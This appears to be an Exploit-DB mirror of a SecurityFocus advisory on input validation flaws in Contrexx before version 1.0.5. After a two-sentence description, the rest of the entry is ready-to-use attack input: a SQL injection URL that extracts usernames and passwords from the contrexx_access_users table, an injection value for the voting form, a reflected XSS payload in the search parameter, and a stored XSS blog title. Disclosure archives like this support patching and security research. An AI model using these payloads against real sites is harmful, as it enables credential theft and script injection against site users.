exploit-db-mirror/exploits/php/webapps/26019.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

13 lines
No EOL
679 B
Text

source: https://www.securityfocus.com/bid/14352/info
Contrexx is affected by multiple input validation vulnerabilities. These issues can allow an attacker to carry out HTML injection, SQL injection and information disclosure attacks.
Contrexx versions prior to 1.0.5 are affected.
supply the 'votingoption' parameter as value="1 /*!50030%20s*/" and submit the form.
/index.php?section=gallery&cmd=showCat&cid=41&pId=1%20/**/UNION/**/%20/**/SELECT/**/%201,1,CONCAT(username,'-',password),1,1,1%20/**/FROM%20contrexx_access_users
/index.php?section=search&term=%22%3E%3Cscr\ipt%3Ealert(%22xss%22)%3C/sc\ript%3E
Create a blog entry with the title <script>alert('xss')</script>